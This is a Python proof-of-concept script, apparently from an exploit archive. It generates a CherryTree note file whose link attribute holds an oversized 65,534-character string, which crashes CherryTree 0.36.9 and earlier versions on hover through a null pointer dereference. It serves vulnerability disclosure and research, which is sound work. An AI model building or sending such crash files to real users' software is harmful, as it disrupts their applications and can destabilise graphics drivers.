#!/usr/bin/python

### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### 

# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better

# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)

# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.

# Exploit code
# ============

crashfile = '''<?xml version="1.0" ?>
<cherrytree>
    <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
        <rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
    </node>
</cherrytree>
'''

with open("PoC-1.ctd", 'w') as f:
    f.write(crashfile)
    f.close()